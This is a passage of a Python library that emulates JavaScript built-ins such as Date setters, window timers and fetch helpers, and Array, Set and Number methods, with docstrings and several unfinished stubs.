"""Deprecated. Use the getFullYear() method instead"""
return self.date.year
@staticmethod
def now():
"""Returns the number of milliseconds since midnight Jan 1, 1970"""
return round(time.time() * 1000)
def setDate(self, day: int):
"""Sets the day of the month of a date object
Args:
day (int): An integer representing the day of the month.
Returns:
int: milliseconds between epoch and updated date.
"""
days_in_the_month = lambda d: calendar.monthrange(d.year, d.month)[1]
while day < 0:
current_month = self.date.month
self.setMonth(current_month - 1)
day += days_in_the_month(self.date)
while day > days_in_the_month(self.date):
day -= days_in_the_month(self.date)
self.date = self.date.replace(day=int(1))
            # setMonth() is 0-based, so passing the current 1-based month advances one month
            self.setMonth(self.date.month)
if day > 0:
self.date = self.date.replace(day=int(day))
return self.getTime()
def setFullYear(self, yearValue: int, monthValue: int = None, dateValue: int = None):
"""Sets the year of a date object
Args:
yearValue (_type_): _description_
monthValue (int, optional): _description_. Defaults to None.
dateValue (int, optional): _description_. Defaults to None.
Returns:
int: milliseconds between epoch and updated date.
"""
self.date = self.date.replace(year=int(yearValue))
if monthValue is not None:
self.setMonth(monthValue)
if dateValue is not None:
self.setDate(dateValue)
return self.getTime()
def setHours(self, hoursValue: int, minutesValue: int = None, secondsValue: int = None, msValue: int = None):
"""Sets the hour of a date object
Args:
hoursValue (int): an integer between 0 and 23
minutesValue (int, optional): an integer between 0 and 59
secondsValue (int, optional): an integer between 0 and 59,
msValue (int, optional): a number between 0 and 999,
Returns:
int: milliseconds between epoch and updated date.
"""
while hoursValue > 23:
current_day = self.date.day
self.setDate(current_day + 1)
hoursValue -= 24
while hoursValue < 0:
current_day = self.date.day
self.setDate(current_day - 1)
hoursValue += 24
self.date = self.date.replace(hour=int(hoursValue))
if minutesValue is not None:
self.setMinutes(minutesValue)
if secondsValue is not None:
self.setSeconds(secondsValue)
if msValue is not None:
self.setMilliseconds(msValue)
return self.getTime()
def setMilliseconds(self, milliseconds: int):
"""Sets the milliseconds of a date object
Args:
milliseconds (int): Milliseconds to set i.e 123
"""
microseconds = int(milliseconds) * 1000
self.date = self.date.replace(microsecond=microseconds)
# return
def setMinutes(self, minutesValue: int, secondsValue: int = None, msValue: int = None):
"""Set the minutes of a date object
Args:
minutesValue (int, optional): an integer between 0 and 59
secondsValue (int, optional): an integer between 0 and 59,
msValue (int, optional): a number between 0 and 999,
Returns:
int: milliseconds between epoch and updated date.
"""
        while minutesValue > 59:
            current_hour = self.date.hour
            self.setHours(current_hour + 1)
            minutesValue -= 60
        while minutesValue < 0:
            current_hour = self.date.hour
            self.setHours(current_hour - 1)
            minutesValue += 60
self.date = self.date.replace(minute=int(minutesValue))
if secondsValue is not None:
self.setSeconds(secondsValue)
if msValue is not None:
self.setMilliseconds(msValue)
return self.getTime()
def setMonth(self, monthValue: int, dayValue: int = None): # -> int:
"""Sets the month of a date object
Args:
monthValue (int): a number from 0 to 11 indicating the month.
dayValue (int, optional): an optional day of the month. Defaults to 0.
Returns:
int: milliseconds between epoch and updated date.
"""
        while monthValue < 0:
            current_year = self.date.year
            self.setFullYear(current_year - 1)
            monthValue += 12
        while monthValue > 11:
            current_year = self.date.year
            self.setFullYear(current_year + 1)
            monthValue -= 12
        # monthValue is now in 0..11. If the target month has fewer days, JS
        # rolls the spare days over into the following month: 31 Aug 2016 with
        # setMonth(1) becomes 2 Mar 2016, since February that year has 29 days.
        # Python's replace() would raise for an invalid day, so handle the
        # spill-over explicitly.
        target_month_total_days = calendar.monthrange(self.date.year, monthValue + 1)[1]
        leftovers = self.getDate() - target_month_total_days
        if leftovers > 0:
            self.date = self.date.replace(day=int(leftovers))
            if monthValue + 2 > 12:
                self.date = self.date.replace(year=self.date.year + 1, month=1)
            else:
                self.date = self.date.replace(month=int(monthValue + 2))
        else:
            self.date = self.date.replace(month=int(monthValue + 1))
if dayValue is not None:
self.setDate(dayValue)
return self.getTime()
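    # Illustrative month overflow, mirroring the JS behaviour described above:
    #
    #   d = Date("31 Aug 2016")
    #   d.setMonth(1)        # February 2016 has only 29 days, so...
    #   d.toDateString()     # -> '2016-03-02'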
def setSeconds(self, secondsValue: int, msValue: int = None):
"""Sets the seconds of a date object
Args:
secondsValue (int): _description_
msValue (int, optional): _description_. Defaults to None.
Returns:
int: milliseconds between epoch and updated date.
"""
self.date = self.date.replace(second=int(secondsValue))
if msValue is not None:
self.setMilliseconds(msValue)
return self.getTime()
def setTime(self, milliseconds: int = None):
"""Sets the date and time of a date object
Args:
milliseconds (_type_, optional): _description_. Defaults to None.
Returns:
_type_: _description_
"""
if milliseconds is None:
self.date = datetime.datetime.now()
else:
self.date = datetime.datetime.fromtimestamp(milliseconds / 1000)
return milliseconds
def setUTCDate(self, day):
"""Sets the day of the month of a date object, according to universal time"""
self.setDate(day)
return self.getTime()
def setUTCFullYear(self, year):
"""Sets the year of a date object, according to universal time"""
self.setFullYear(year)
return self.getTime()
def setUTCHours(self, hour):
"""Sets the hour of a date object, according to universal time"""
self.setHours(hour)
return self.getTime()
def setUTCMilliseconds(self, milliseconds):
"""Sets the milliseconds of a date object, according to universal time"""
self.setMilliseconds(milliseconds)
return self.getTime()
def setUTCMinutes(self, minutes):
"""Set the minutes of a date object, according to universal time"""
self.setMinutes(minutes)
return self.getTime()
def setUTCMonth(self, month):
"""Sets the month of a date object, according to universal time"""
self.setMonth(month)
return self.getTime()
def setUTCSeconds(self, seconds):
"""Set the seconds of a date object, according to universal time"""
self.setSeconds(seconds)
return self.getTime()
    def setYear(self, year):
        """Deprecated. Use the setFullYear() method instead"""
        self.date = self.date.replace(year=int(year))
        return self.getTime()
# TODO - there may not be a date object already?
def toDateString(self):
"""Converts the date portion of a Date object into a readable string"""
return self.date.strftime("%Y-%m-%d")
def toUTCString(self):
"""Converts a Date object to a string, according to universal time"""
return self.date.strftime("%Y-%m-%d %H:%M:%S")
def toGMTString(self):
"""Deprecated. Use the toUTCString() method instead"""
return self.toUTCString()
def toJSON(self):
"""Returns the date as a string, formatted as a JSON date"""
return json.dumps(self.date.strftime("%Y-%m-%d"))
    def toISOString(self):
        """Returns the date as a string, using the ISO standard (date and time, millisecond precision)"""
        return self.date.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"
def toLocaleDateString(self):
"""Returns the date portion of a Date object as a string, using locale conventions"""
return self.date.strftime("%x")
def toLocaleString(self):
"""Converts a Date object to a string, using locale conventions"""
return self.date.strftime("%x")
def toLocaleTimeString(self):
"""Returns the time portion of a Date object as a string, using locale conventions"""
return self.date.strftime("%X")
def toTimeString(self):
"""Converts the time portion of a Date object to a string"""
return self.date.strftime("%X")
    def UTC(self):
        """Returns the number of milliseconds in a date since midnight of January 1, 1970, according to UTC time"""
        return self.getTime()
# TODO - add all dunders and test
# def __eq__(self, other):
# return self.date == other.date
# def __ne__(self, other):
# return self.date != other.date
# def __lt__(self, other):
# return self.date < other.date
# def __le__(self, other):
# return self.date <= other.date
# def __gt__(self, other):
# return self.date > other.date
# def __ge__(self, other):
# return self.date >= other.date
class Screen:
"""screen"""
# wrap a lib?
# https://github.com/rr-/screeninfo?
def __init__(self):
# from sys import platform
# if platform == "linux" or platform == "linux2":
# # linux
# import subprocess
# resuls = subprocess.Popen(['xrandr'],stdout=subprocess.PIPE).communicate()[0].split("current")[1].split(",")[0]
# width = resuls.split("x")[0].strip()
# heigth = resuls.split("x")[1].strip()
# print width + "x" + heigth
# elif platform == "darwin":
# # OS X
# results = str(subprocess.Popen(['system_profiler SPDisplaysDataType'],stdout=subprocess.PIPE, shell=True).communicate()[0])
# res = re.search('Resolution: \d* x \d*', results).group(0).split(' ')
# width, height = res[1], res[3]
# return width, height
# elif platform == "win32":
# from win32api import GetSystemMetrics
# print("Width =", GetSystemMetrics(0))
# print("Height =", GetSystemMetrics(1))
pass
def availHeight(self):
"""Returns the height of the screen (excluding the Windows Taskbar)"""
# return self.height
raise NotImplementedError
def availWidth(self):
"""Returns the width of the screen (excluding the Windows Taskbar)"""
raise NotImplementedError
def colorDepth(self):
"""Returns the colorDepth"""
raise NotImplementedError
def height(self):
"""Returns the total height of the screen"""
raise NotImplementedError
def pixelDepth(self):
"""Returns the pixelDepth"""
raise NotImplementedError
def width(self):
"""Returns the total width of the screen"""
raise NotImplementedError
class ProgramKilled(Exception):
pass
class Job(threading.Thread):
def __init__(self, interval, execute, *args, **kwargs):
threading.Thread.__init__(self)
self.daemon = False
self.stopped = threading.Event()
self.interval = interval
self.execute = execute
self.args = args
self.kwargs = kwargs
def stop(self):
self.stopped.set()
self.join()
def run(self):
while not self.stopped.wait(self.interval.total_seconds()):
self.execute(*self.args, **self.kwargs)
# def __str__(self):
# return "Job every %s" % self.interval
class SetInterval:
def signal_handler(self, signum, frame):
raise ProgramKilled
def __init__(self, function, time, *args, **kwargs):
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGINT, self.signal_handler)
self.job = Job(datetime.timedelta(microseconds=time * 1000), function, *args, **kwargs)
self.job.start()
# def stop(self):
# self.job.stop()
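# Usage sketch (illustrative): run a callback every second and stop it later.
# Window.setInterval (aliased below) wraps this class and returns the Job:
#
#   job = SetInterval(lambda: print("tick"), 1000).job
#   # ... later, from the main thread:
#   job.stop()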
class Promise:
# undocumented - warning. use at own risk
def __init__(self, func=None, *args, **kwargs):
# print('init')
self.data = None
self.state = "pending" # fullfilled, rejected
if func is not None:
func(self.resolve, self.reject)
def then(self, func):
if func is not None:
# print('--->',self.data)
self.data = func(self.data)
# print('-->',self.data)
return self
def catch(self, error):
# func(error)
print(error)
return self
def resolve(self, data):
# print( 'resolve called::', data )
self.data = data
self.state = "fulfilled"
return self
def reject(self, data):
self.data = data
self.state = "rejected"
return self
# def __str__(self):
# try:
# return self.data.text
# except Exception as e:
# print(e)
# return str(self)
class FetchedSet: # not a promise
def __init__(self, *args, **kwargs):
self.results = []
def __getitem__(self, index):
return self.results[index]
def oncomplete(self, func): # runs once all results are back
func(self.results)
return
# def __call__(self, func):
# self.results.append(func)
class Window:
"""window"""
localStorage = Storage()
location = "eventual.technology"
def __init__(self, *args, **kwargs):
# self.console = dom.console
# self.document = Document
# globals()?
# dir()?
# locals()?
pass
# TODO - tell users to use other window class if methods are called.
@staticmethod
def alert(msg):
"""Displays an alert box with a message and an OK button"""
print(msg)
return
@staticmethod
def prompt(msg, default_text=""):
"""Displays a dialog box that prompts the visitor for input"""
print(msg)
data = input()
return data
setTimeout = Global.setTimeout
clearTimeout = Global.clearTimeout
@staticmethod
def clearInterval(job):
job.stop()
@staticmethod
def setInterval(function, time, *args, **kwargs):
interval_ID = SetInterval(function, time, *args, **kwargs)
return interval_ID.job
@staticmethod
def _do_request(url, f=None, **kwargs):
# private - don't use directly. use one of the fetch methods
try:
# r = requests.get(url, timeout=3)
from requests import Request, Session
method = "GET"
if "method" in kwargs:
method = kwargs["method"]
if "callback_function" in kwargs:
del kwargs["callback_function"]
if "error_handler" in kwargs:
del kwargs["error_handler"]
s = Session()
req = Request(method, url)
prepped = s.prepare_request(req)
r = s.send(prepped, **kwargs)
# print(r.status_code)
s.close()
if f is not None and type(f) is FetchedSet:
f.results.append(r)
return r
except Exception as e:
print(f"Request Failed for URL: {url}", e)
return None
@staticmethod
def fetch(url: str, **kwargs):
# undocumented - warning. use at own risk
# note - kinda pointless atm. just use requests directly and you wont have to muck about with a Promise
if type(url) is not str:
raise ValueError("fetch takes a single url string. use fetch_set, fetch_threaded or fetch_pooled")
f = Promise()
        r = window._do_request(url, f, **kwargs)
return f.resolve(r)
@staticmethod
def fetch_set(urls: list, callback_function=None, error_handler=None, **kwargs):
# undocumented - warning. use at own risk
# note - still blocks. just gets all before continuing
# problems - all urls can only have 1 associated callback, error and set of kwargs
if type(urls) is str:
urls = [urls] # leniency
f = FetchedSet()
for url in urls:
r = window.fetch(url, **kwargs).then(callback_function)
f.results.append(r.data)
return f
@staticmethod
def fetch_threaded(urls: list, callback_function=None, error_handler=None, **kwargs):
# undocumented - warning. use at own risk
# note - still blocks. just gets all before continuing using threads
# problems - all urls can only have 1 associated callback, error and set of kwargs
if type(urls) is str:
urls = [urls] # leniency
f = FetchedSet()
jobs = []
        for url in urls:
            # pass the callable and its arguments separately; calling it here
            # would run the request immediately instead of on the thread
            thread = threading.Thread(target=window._do_request, args=(url, f), kwargs=kwargs)
            # thread.setDaemon(True) # deprecated
            thread.daemon = True
            jobs.append(thread)
        for j in jobs:
            j.start()
        for j in jobs:
            j.join()
# f = FetchedSet()
return f
@staticmethod
def fetch_pooled(urls: list, callback_function=None, error_handler=None, **kwargs):
# undocumented - warning. use at own risk
# note - still blocks. just gets all before continuing using a pool
# problems - all urls can only have 1 associated callback, error and set of kwargs
if type(urls) is str:
urls = [urls] # leniency
f = FetchedSet()
def _do_request_wrapper(obj):
url = obj["url"]
f = obj["f"]
kwargs = obj["k"]
kwargs["callback_function"] = obj["c"]
kwargs["error_handler"] = obj["e"]
window._do_request(url, f, **kwargs)
jobs = []
p = Pool()
urls = [{"url": url, "f": f, "c": callback_function, "e": error_handler, "k": kwargs} for url in urls]
results = p.map(_do_request_wrapper, urls)
p.close()
p.join()
return f
# def fetch_aysnc( urls: list, options={}, type="async" ):
# TODO - a version using async/await
@staticmethod
def btoa(dataString):
"""Encodes a string in base-64"""
import base64
dataBytes = dataString.encode("utf-8")
encoded = base64.b64encode(dataBytes)
return encoded
@staticmethod
def atob(dataString):
"""Decodes a base-64 encoded string"""
import base64
return base64.b64decode(dataString).decode()
@staticmethod
def requestAnimationFrame(callback):
"""[requests a frame of an animation]
Args:
callback (callable): [the callback function]
Returns:
[type]: [description]
"""
        perf = performance.now()
return callback(perf)
# these probably should have been on global. will see about moving them later
setInterval = Window.setInterval
clearInterval = Window.clearInterval
Global.setInterval = Window.setInterval
Global.clearInterval = Window.clearInterval
window = Window
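# Usage sketch (illustrative): the Window helpers mirror their JS namesakes:
#
#   window.btoa("hello")     # -> b'aGVsbG8='
#   window.atob("aGVsbG8=")  # -> 'hello'
#   window.setTimeout(lambda: print("hi"), 100)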
class Array:
"""javascript array"""
@staticmethod
def from_(obj): # TODO - test
"""Creates a new Array instance from an array-like or iterable object."""
# return Array(object)
if isinstance(obj, Array):
return obj
elif isinstance(obj, list):
return Array(*obj)
elif isinstance(obj, tuple):
items = list(obj)
return Array(*items)
elif isinstance(obj, dict):
items = list(obj.items())
return Array(*items)
# if it is iterable unpack it
elif hasattr(obj, "__iter__"):
items = list(obj)
return Array(*items)
else:
return Array([obj])
@staticmethod
    def of(*args):  # TODO - test
        """Creates a new Array instance with a variable number of arguments,
        regardless of number or type of the arguments."""
        # bypass the casting in __init__ so Array.of(7) is [7], not 7 empty slots
        a = Array()
        a.args = list(args)
        return a
def __init__(self, *args):
"""[An Array that behaves like a js array]"""
# casting
if len(args) == 1:
if isinstance(args[0], list):
self.args = args[0]
return
elif isinstance(args[0], int):
# self.args = [None] * args[0]
# self.args = [null()] * args[0]
self.args = [""] * args[0]
return
self.args = list(args)
self.prototype = self
def __getitem__(self, index):
return self.args[index]
    def __getattribute__(self, name):
        try:
            return super().__getattribute__(name)
        except AttributeError:
            # if it's a list method, delegate to the underlying args list
            if name in dir(list):
                return getattr(self.args, name)
            raise
def __setitem__(self, index, value):
self.args[index] = value
def __add__(self, value):
if isinstance(value, int):
raise ValueError("int not supported")
if isinstance(value, Array):
self.args = self.args + value.args
if isinstance(value, list):
self.args = self.args + value
return self.args
def __len__(self):
return len(self.args)
def __eq__(self, other):
if isinstance(other, Array):
return self.args == other.args
if isinstance(other, list):
return self.args == other
return False
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return str(self.args)
def __iter__(self):
for i in self.args:
yield i
# self.args.__iter__()
    def __sub__(self, value):
        if isinstance(value, int):
            raise ValueError("int not supported")
        if isinstance(value, Array):
            value = value.args
        if isinstance(value, list):
            # python lists have no '-' operator, so remove the elements explicitly
            self.args = [item for item in self.args if item not in value]
        return self.args
def toString(self):
"""Converts an array to a string, and returns the result"""
return str(self.args) # TODO - check what js does
def toSource(self):
"""
Returns the source array.
"""
return list(self.args)
@property
def length(self):
"""Sets or returns the number of elements in an array"""
return len(self.args)
def concat(self, *args):
"""[Joins two or more arrays, and returns a copy of the joined arrays]
Returns:
[list]: [returns a copy of the joined arrays]
"""
for a in args:
self.args += a
return self.args
    def flat(self, depth=1):  # TODO - test
        """[Flattens an array into a single-dimensional array up to the given depth]"""
        if depth < 1:
            return list(self.args)
        flat = []
        for i in self.args:
            if isinstance(i, Array):
                flat += i.flat(depth - 1)
            elif isinstance(i, (list, tuple)):
                flat += Array(list(i)).flat(depth - 1)
            else:
                flat.append(i)
        return flat

    def flatMap(self, fn):  # TODO - test
        """[Maps a function over an array and flattens the result one level]"""
        out = []
        for i in self.args:
            mapped = fn(i)
            if isinstance(mapped, Array):
                out += mapped.args
            elif isinstance(mapped, (list, tuple)):
                out += list(mapped)
            else:
                out.append(mapped)
        return Array(out)
def fill(self, value=None, start=None, end=None):
"""[Fills elements of an array from a start index to an end index with a static value]"""
if start is None:
start = 0
if end is None:
end = len(self.args)
for i in range(start, end):
self.args[i] = value
return self.args
def groupBy(self, callback) -> dict: # TODO - test
"""[Groups the elements of an array according to the result of calling a callback function on each element]
Args:
callback (callable): [the callback recieves the following paramters(value, index, target)]
Returns:
[dict]: [a dictionary of arrays]
"""
groups = {}
for i in range(len(self.args)):
key = callback(self.args[i], i, self.args)
if key in groups:
groups[key].append(self.args[i])
else:
groups[key] = [self.args[i]]
return groups
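    # Illustrative grouping; the callback receives (value, index, target):
    #
    #   a = Array(1, 2, 3, 4)
    #   a.groupBy(lambda v, i, arr: "even" if v % 2 == 0 else "odd")
    #   # -> {'odd': [1, 3], 'even': [2, 4]}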
# def groupByToMap(self, callback):
# """[returns a Map object]
# """
# groups = {}
# for i in range(len(self.args)):
# key = callback(self.args[i], i, self.args)
# if key in groups:
# groups[key].append(self.args[i])
# else:
# groups[key] = [self.args[i]]
# return Map(groups)
def findLast(self, callback):
"""[Returns the last element in an array that passes a test]"""
for i in range(len(self.args) - 1, -1, -1):
if callback(self.args[i], i, self.args):
return self.args[i]
return None
def findLastIndex(self, callback):
"""[Returns the last index of an element in an array that passes a test]"""
for i in range(len(self.args) - 1, -1, -1):
if callback(self.args[i], i, self.args):
return i
return -1
def includes(self, value): # -> bool:
"""[Check if an array contains the specified item
Args:
value ([any]): [any value]
Returns:
[bool]: [a boolean]
"""
if value in self.args:
return True
else:
return False
def indexOf(self, value):
"""Search the array for an element and returns its position"""
# for count, each in enumerate(self.args):
# if each == value:
# return count
try:
return self.args.index(value)
except ValueError:
return -1
except Exception as e:
# print(e)
return -1
@staticmethod
def isArray(thing):
"""[Checks whether an object is an array]
Args:
thing ([type]): [thing to check]
Returns:
[bool]: [True if the object is list, tuple or Array]
"""
if isinstance(thing, (list, tuple, Array)):
return True
else:
return False
def join(self, value):
"""Joins all elements of an array into a string"""
# TODO - get passed param names
return value.join([str(x) for x in self.args])
    def lastIndexOf(self, value):
        """Search the array for an element, starting at the end, and returns its position (-1 if not found)"""
        try:
            return len(self.args) - self.args[::-1].index(value) - 1
        except ValueError:
            return -1
def pop(self):
"""Removes the last element of an array, and returns that element"""
# item = self.args[len(self.args)-1]
# del self.args[len(self.args)-1]
return self.args.pop()
def push(self, value):
"""Adds new elements to the end of an array, and returns the new length"""
self.args.append(value)
return len(self.args)
def reverse(self):
"""Reverses the order of the elements in an array"""
self.args = self.args[::-1]
return self.args
def slice(self, start=0, stop=None, step=1):
"""[Selects a part of an array, and returns the new array]
Args:
start ([int]): [index to slice from]
stop ([int], optional): [index to slice to]. Defaults to end of the array.
step (int, optional): [description]. Defaults to 1.
Returns:
[type]: [new array]
"""
if stop is None:
stop = len(self.args)
return self.args[slice(start, stop, step)]
    def splice(self, start, delete_count=None, *items):
        """Removes elements from the array (optionally replacing them with items), and returns the removed elements"""
if delete_count is None:
delete_count = len(self.args) - start
total = start + delete_count
removed = self.args[start:total]
self.args[start:total] = items
return removed
# return self.args
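    # A short sketch of the splice semantics implemented above (hypothetical values):
    # >>> a = Array('a', 'b', 'c', 'd')
    # >>> a.splice(1, 2, 'x')  # remove 2 items at index 1, insert 'x' in their place
    # ['b', 'c']               # the removed elements are returned
    # >>> a.args
    # ['a', 'x', 'd']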
def unshift(self, *args):
"""[Adds new elements to the beginning of an array, and returns the new length]
Returns:
[int]: [the length of the array]
"""
for i in reversed(args):
self.args.insert(0, i)
return len(self.args)
def shift(self):
"""[removes the first element from an array and returns that removed element]
Returns:
[type]: [the removed array element]
"""
item = self.args[0]
del self.args[0]
return item
def map(self, func):
"""[Creates a new array with the result of calling a function for each array element]
Args:
func ([type]): [a function to call on each array element]
Returns:
[list]: [a new array]
"""
# print(func)
return [func(value) for value in self.args]
# return map(self.args, func)
def some(self, func):
"""Checks if any of the elements in an array pass a test"""
return any(func(value) for value in self.args)
    def sort(self, func=None):  # , *args, **kwargs):
        """Sorts the elements of an array"""
        if func is not None:
            import functools
            # a JS-style comparator returns negative/zero/positive, like the old cmp functions
            self.args.sort(key=functools.cmp_to_key(func))
            return self.args
        # default JS sort compares the elements as strings (lexicographically)
        self.args.sort(key=str)
        return self.args
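    # A usage sketch for sort (assumes the comparator contract noted above):
    # >>> Array(10, 1, 5).sort()                    # default: lexicographic, as in JS
    # [1, 10, 5]
    # >>> Array(10, 1, 5).sort(lambda a, b: a - b)  # numeric comparator
    # [1, 5, 10]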
    def reduce(self, callback, initialValue=None):
        """Reduces the array to a single value (going left-to-right)
        callback receives these parameters: previousValue, currentValue, currentIndex, array
        """
        import inspect
        arguments = self.args
        if initialValue is None:
            initialValue = arguments[0]
            arguments = arguments[1:]
        nparams = len(inspect.signature(callback).parameters)
        for i, value in enumerate(arguments):
            if nparams == 4:
                initialValue = callback(initialValue, value, i, arguments)
            elif nparams == 3:
                initialValue = callback(initialValue, value, i)
            elif nparams == 2:
                initialValue = callback(initialValue, value)
            elif nparams == 1:
                initialValue = callback(initialValue)
            else:
                raise Exception("Callback does not have the correct number of parameters")
        return initialValue
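    # A usage sketch for reduce (the callback arity is inspected, per the code above):
    # >>> Array(1, 2, 3, 4).reduce(lambda acc, value: acc + value)
    # 10
    # >>> Array(1, 2, 3, 4).reduce(lambda acc, value: acc + value, 100)
    # 110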
    def reduceRight(self, callback, initialValue=None):
        """Reduces the array to a single value (going right-to-left)
        callback receives these parameters: previousValue, currentValue, currentIndex, array
        """
        import inspect
        arguments = self.args
        if initialValue is None:
            initialValue = arguments[-1]
            arguments = arguments[:-1]
        nparams = len(inspect.signature(callback).parameters)
        for i, value in enumerate(reversed(arguments)):
            if nparams == 4:
                initialValue = callback(initialValue, value, i, arguments)
            elif nparams == 3:
                initialValue = callback(initialValue, value, i)
            elif nparams == 2:
                initialValue = callback(initialValue, value)
            elif nparams == 1:
                initialValue = callback(initialValue)
            else:
                raise Exception("Callback does not have the correct number of parameters")
        return initialValue
def filter(self, func):
"""
Creates a new array with every element in an array that pass a test
i.e. even_numbers = someArr.filter( lambda x: x % 2 == 0 )
"""
# written by .ai (https://6b.eleuther.ai/)
# filtered = []
# for value in self.args:
# if func(value):
# filtered.append(value)
# return filtered
return list(filter(func, self.args))
def find(self, func):
"""Returns the value of the first element in an array that pass a test"""
for each in self.args:
if func(each):
return each
    def findIndex(self, func):
        """Returns the index of the first element in an array that passes a test, or -1"""
        for i, item in enumerate(self.args):
            if func(item):
                return i
        return -1
def forEach(self, func):
"""Calls a function for each array element"""
# written by .ai (https://6b.eleuther.ai/)
for value in self.args:
func(value)
# TODO - is this supposed to pass count like Node list? i.e.
# for i in range(len(self.args)):
# func(self.args[i], i, self.args)
    def keys(self):
        """Returns an Array Iteration Object, containing the keys (indexes) of the original array"""
        for i in range(len(self.args)):
            yield i
    def copyWithin(self, target, start=0, end=None):
        """Copies a sequence of array elements within the array to the position starting at target"""
        if end is None:
            end = len(self.args)
        chunk = self.args[start:end]
        for i, value in enumerate(chunk):
            if target + i >= len(self.args):
                break
            self.args[target + i] = value
        return self.args
    def entries(self):
        """[Returns a key/value pair Array Iteration Object]
        Yields:
            [type]: [key/value pair]
        """
        for i, value in enumerate(self.args):
            yield [i, value]
def every(self, func):
"""[Checks if every element in an array pass a test]
Args:
func ([type]): [test function]
Returns:
[bool]: [if every array elemnt passed the test]
"""
return all(func(value) for value in self.args)
def at(self, index: int):
"""[takes an integer value and returns the item at that index,
allowing for positive and negative integers.
Negative integers count back from the last item in the array.]
Args:
index ([type]): [position of item]
Returns:
[type]: [item at the given position]
"""
return self.args[index]
Array.prototype = Array
class Set:
def __init__(self, *args):
"""[The Set object lets you store unique values of any type, whether primitive values or object references.
TODO - will need to store dictionaries unlike a python set
https://stackoverflow.com/questions/34097959/add-a-dictionary-to-a-set-with-union
]
"""
self.args = set(args)
def __iter__(self):
return iter(self.args)
def __len__(self):
return len(self.args)
def __contains__(self, item):
return item in self.args
def __repr__(self):
return repr(self.args)
def __str__(self):
return str(self.args)
@property
def species(self):
"""The constructor function that is used to create derived objects."""
# return self.args
raise NotImplementedError
@property
def size(self):
"""Returns the number of values in the Set object."""
return len(self.args)
def add(self, value):
"""Appends value to the Set object. Returns the Set object with added value."""
# print(type(self.args), value)
self.args.add(value)
return self.args
def clear(self):
"""Removes all elements from the Set object."""
self.args.clear()
    def delete(self, value):
        """Removes the element associated to the value
        returns a boolean asserting whether an element was successfully removed or not."""
        if value in self.args:
            self.args.remove(value)
            return True
        return False
def has(self, value):
"""Returns a boolean asserting whether an element is present with the given value in the Set object or not."""
return value in self.args
def contains(self, value):
"""Returns a boolean asserting whether an element is present with the given value in the Set object or not."""
return value in self.args
# Set.prototype[@@iterator]()
# Returns a new iterator object that yields the values for each element in the Set object in insertion order.
def values(self):
"""Returns a new iterator object that yields the values for each element
in the Set object in insertion order."""
return iter(self.args)
# def keys(self):
# """ An alias for values """ #?
# return self.values()
    def entries(self):
        """Returns a new iterator object that contains an array of [value, value] for each element in the Set object,
        in insertion order."""
        return iter([[i, i] for i in self.args])
# This is similar to the Map object, so that each entry's key is the same as its value for a Set.
def forEach(self, callbackFn, thisArg=None):
"""Calls callbackFn once for each value present in the Set object, in insertion order.
If a thisArg parameter is provided, it will be used as the this value for each invocation of callbackFn.
"""
for i in self.args:
callbackFn(i, thisArg)
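# A minimal usage sketch for the Set wrapper above (hashable values only, per its TODO note):
# >>> s = Set(1, 2, 2, 3)
# >>> s.size
# 3
# >>> s.has(2)
# True
# >>> s.delete(2)
# True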
class Number(float):
"""javascript Number methods"""
# print(sys.float_info)
MAX_VALUE = list(sys.float_info)[0]
MIN_VALUE = 5e-324 # CHANGE no longer > list(sys.float_info)[3]
    NEGATIVE_INFINITY = float("-inf")  #: Represents negative infinity (returned on overflow) Number
    POSITIVE_INFINITY = float("inf")  #: Represents infinity (returned on overflow) Number
# prototype Allows you to add properties and methods to an object Number
def __init__(self, x="", *args, **kwargs):
self.x = Global.Number(x)
def __add__(self, other):
return self.x + other
def __sub__(self, other):
return self.x - other
def __mul__(self, other):
return self.x * other
def __div__(self, other):
return self.x / other
def __mod__(self, other):
return self.x % other
def __pow__(self, other):
return self.x ** other
def __neg__(self):
return -self.x
def __pos__(self):
return +self.x
def __abs__(self):
return abs(self.x)
def __invert__(self):
return ~self.x
def __lt__(self, other):
return self.x < other
def __le__(self, other):
return self.x <= other
def __eq__(self, other):
return self.x == other
def __ne__(self, other):
return self.x != other
def __gt__(self, other):
return self.x > other
def __ge__(self, other):
return self.x >= other
def __and__(self, other):
return self.x & other
def __or__(self, other):
return self.x | other
def __xor__(self, other):
return self.x ^ other
def __lshift__(self, other):
return self.x << other
def __rshift__(self, other):
return self.x >> other
def __iadd__(self, other):
return self.x + other
def __isub__(self, other):
return self.x - other
def __imul__(self, other):
return self.x * other
def __idiv__(self, other):
return self.x / other
def __imod__(self, other):
return self.x % other
def __ipow__(self, other):
return self.x ** other
def __ilshift__(self, other):
return self.x << other
def __irshift__(self, other):
return self.x >> other
def __iand__(self, other):
return self.x & other
def __ior__(self, other):
return self.x | other
def __ixor__(self, other):
return self.x ^ other
def __floordiv__(self, other):
return self.x // other
def __rfloordiv__(self, other):
return other // self.x
def __ifloordiv__(self, other):
return other // self.x
def __truediv__(self, other):
return self.x / other
def __rtruediv__(self, other):
return other / self.x
def __itruediv__(self, other):
return other / self.x
def __rmod__(self, other):
return other % self.x
    def isInteger(self):
        """Checks whether a value is an integer (an int, or a float with no fractional part)"""
        return isinstance(self.x, int) or (isinstance(self.x, float) and self.x.is_integer())
def isSafeInteger(self):
"""Checks whether a value is a safe integer"""
raise NotImplementedError
def toExponential(self, num=None):
"""Converts a number into an exponential notation"""
if num is not None:
exp = "{:e}".format(Number(Number(self.x).toFixed(num)))
else:
exp = "{:e}".format(self.x)
if "e" in str(self.x):
exp = str(self.x) # python already converts.
n = exp.split("e")[0].rstrip("0")
e = exp.split("e")[1].replace("00", "0")
if n == "0.":
n = "0"
if int(e) != 0:
if int(e) < 10 and int(e) > -10: # TODO - not correct. lazy way to strip left 0s only
e = e.replace("0", "")
# print( "AND:", n, "e" , e )
if n.endswith("."):
n = n.strip(".")
return n + "e" + e
def toFixed(self, digits: int):
"""[formats a number using fixed-point notation.]
Args:
digits ([int]): [The number of digits to appear after the decimal point
Returns:
[str]: [A string representing the given number using fixed-point notation.]
"""
# print("DIGIT!", digits)
if digits < 0:
digits = 0
fstring = "{:." + str(digits) + "f}"
return fstring.format(round(self.x, digits))
    def toPrecision(self, precision):
        """[returns a string representing the Number object to the specified precision.]
        Args:
            precision ([int]): [An integer specifying the number of significant digits.]
        Returns:
            [str]: [A string representing a Number object in fixed-point
            or exponential notation rounded to precision significant digits]
        """
        precision = int(precision)
        # 'g' formatting rounds to significant digits, a close approximation of the JS behaviour
        return "{:.{p}g}".format(self.x, p=precision)
